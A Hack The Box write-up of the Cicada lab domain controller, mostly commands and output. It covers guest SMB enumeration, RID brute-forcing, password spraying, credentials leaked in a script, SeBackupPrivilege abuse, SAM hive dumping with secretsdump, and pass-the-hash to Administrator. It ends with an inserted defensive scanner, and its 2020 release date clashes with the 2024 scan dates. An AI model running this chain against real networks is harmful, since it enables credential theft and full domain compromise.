Hack The Box Write-Up Cicada
About Cicada
In this post, I’m writing a write-up for the machine Cicada from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.
Cicada is an ‘Easy’ rated box. Grabbing and submitting the user.txt flag raises your points by 10, and submitting the root flag raises your points by 20.
Machine Info
| Field | Value |
| --- | --- |
| Machine Name | Cicada |
| Difficulty | Easy |
| Points | 20 |
| Release Date | 07 Nov 2020 |
| IP | 10.129.231.149 |
| Creator | theblxckcicada |
Recon
Portscan with Nmap
As always, we start this machine with a port scan with Nmap.

```console
nmap -sC -sV -oA ./nmap/10.129.231.149 10.129.231.149
```
The results.
```console
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 05:23 CST
Nmap scan report for 10.129.231.149
Host is up (0.075s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 18:24:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-19T18:24:48
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds
```
Enumeration
rpcclient
Connect with rpcclient as the guest user. ANONYMOUS LOGON also worked, but with limited access.

```console
$ rpcclient --user GUEST --password="" cicada.htb
```
First, check which user we are connected as. This gives us the domain SID, so we can now try to brute-force the RIDs of other accounts.
```console
rpcclient $> lookupnames GUEST
GUEST S-1-5-21-917908876-1423158569-3159038727-501 (User: 1)
rpcclient $>
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-500
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (1)
rpcclient $>
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-502
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (1)
```
Found two users: Guest and Administrator.
smbmap
Checked the SMB shares as guest.
```console
$ smbmap -H cicada.htb -u "guest" -p ""
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
```
Found some interesting shares. Connect to the HR share.
Found the file `Notice from HR.txt`.
```console
root@htb-1d522eiiwk:/home/t13nn3s/my_data# smbclient //cicada.htb/HR --user guest --password ""
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 439288 blocks available
smb: \>
```
Downloaded the file.

```console
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (38.6 KiloBytes/sec) (average 38.6 KiloBytes/sec)
```
Checked the contents of the file.
```console
$ cat Notice\ from\ HR.txt
```
The contents:
```text
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
```
Nice! We found the default password `Cicada$M6Corpb*@Lp#nZp!8`.
User enumeration
Now we only need some usernames, so we can check whether the default password still works for any of them. I wrote a small bash script to enumerate the users by their SID (the domain SID with the RID incremented).
```bash
# Resolve each candidate RID as the guest user and keep only SIDs that map to a
# real account; rpcclient prints "*unknown*\*unknown*" for RIDs that do not exist.
for i in $(seq 500 4000); do
  rpcclient --user "GUEST" --password="" cicada.htb \
    -c "lookupsids S-1-5-21-917908876-1423158569-3159038727-$i" | grep -v "unknown";
done
```
After running the script, we found the following usernames:

```text
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```
After some testing with smbmap, we found that the default password works for the user michael.wrightson.

```console
smbmap -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -H cicada.htb
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
root@htb-vbpxy0fxms:/home/t13nn3s/my_data#
```
First I tried to establish a WinRM connection to this machine as michael.wrightson, but that account has no permission for it. Since we now have valid credentials to authenticate against Active Directory, we can run BloodHound.
```console
bloodhound-python --domain cicada.htb -c all -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -dc cicada-dc.cicada.htb -ns 10.129.231.149 --dns-tcp
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 02S
```
The user account emily.oscars is a member of the group REMOTE MANAGEMENT [email protected].
After further analysis of the members of the group [email protected], we found the password `aRt$Lp#7t*VQ!3`, which belongs to the user david.orelious.
We can restart the SMB enumeration with this user.

```console
smbmap -H cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
```

The output:

```console
[+] IP: cicada.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV READ ONLY
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
```
Connect to the DEV share.

```console
smbclient //cicada.htb/DEV --user david.orelious --password 'aRt$Lp#7t*VQ!3'
```
Interesting file `Backup_script.ps1`. Download the script.

```console
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 424721 blocks available
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,9 KiloBytes/sec) (average 3,9 KiloBytes/sec)
smb: \>
```
Contents of the script.
```powershell
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```
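As an added example (my code, not the box's script or the author's), here is the defender-side check for this finding: it scans the scripts under a path for the pattern that leaked the password in `Backup_script.ps1`, a literal string passed to `ConvertTo-SecureString -AsPlainText`, and also catches literals assigned to password-like variables. The function name, the regexes and the temp directory are my own choices, and the scanned script is a constructed stand-in.

```powershell
# Added example, not part of the box or the original write-up.
# Fix for the underlying issue: keep the secret out of the script, e.g. run the job
# under the service account itself, or store a PSCredential with Export-Clixml, which
# DPAPI-protects it for that account on that host so a copy taken from a share is useless.
function Find-PlaintextCredential {
    param([Parameter(Mandatory)] [string] $Path)

    $patterns = @(
        # A quoted literal handed straight to ConvertTo-SecureString -AsPlainText
        'ConvertTo-SecureString\s+["''][^"'']+["'']\s+-AsPlainText',
        # $password = "..."  (also $pass, $passwd, $pwd)
        '\$(pass|passwd|password|pwd)\s*=\s*["''][^"'']+["'']'
    )

    Get-ChildItem -Path $Path -Recurse -File -Include *.ps1, *.psm1 |
        Select-String -Pattern $patterns |
        ForEach-Object {
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                # Mask the quoted literal so the report itself does not re-leak the secret.
                Finding = ($_.Line -replace '(["''])[^"'']+(["''])', '$1***$2').Trim()
            }
        }
}

# Demonstration against a constructed copy of the offending pattern in a temp directory
# (the account name and password below are made up for this example).
$demo = Join-Path ([IO.Path]::GetTempPath()) 'cicada-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
@'
$username = "svc.backup"
$password = ConvertTo-SecureString "not-a-real-password" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path C:\smb -DestinationPath D:\Backup\smb.zip
'@ | Set-Content -Path (Join-Path $demo 'Backup_script.ps1')

Find-PlaintextCredential -Path $demo | Format-Table -AutoSize
```

Point `-Path` at a mounted copy of the shares new hires can read (here HR and DEV) to find every script that embeds a literal password.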
Start an Evil-WinRM session as emily.oscars.

```console
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
```
Read the user flag.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ls
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/30/2024 9:29 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
ce92f2c2963fea6d4308b59a36eb2dae
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
```
Privilege Escalation
Enumeration
The user account emily.oscars has the SeBackupPrivilege.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
Upload the files.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeCmdLets.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> upload /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll
Info: Uploading /home/johnd/htb/lab/machines/cicada/SeBackupPrivilegeUtils.dll to C:\Users\emily.oscars.CICADA\Documents\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
```
Import the modules, then copy and read root.txt.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Copy-FileSeBackupPrivilege 'C:\users\administrator\desktop\root.txt' .\root.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type root.txt
9668a9dbfd79509169398cbe43f4151a
```
Privilege Escalation
Save the SAM and SYSTEM hives with `reg save` and download them.

```console
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Progress: 28% : |▓▒░░░░░░░░|
```
Use secretsdump on the downloaded hives.

```console
impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```
Log in as Administrator with the recovered hash and read the root flag.

```console
─[eu-dedivip-1]─[10.10.14.38]─[t13nn3s@htb-j5kiqrdxs4]─[~/my_data]
└──╼ [★]$ evil-winrm -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
3cbbc6b21aaa327e9f98355c30e09de5
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```
We have owned CICADA!
Thanks for reading this write-up! Did you enjoy it, or learn something from it? Please consider giving a respect point: https://app.hackthebox.com/profile/224856. Thanks!
Happy Hacking :-)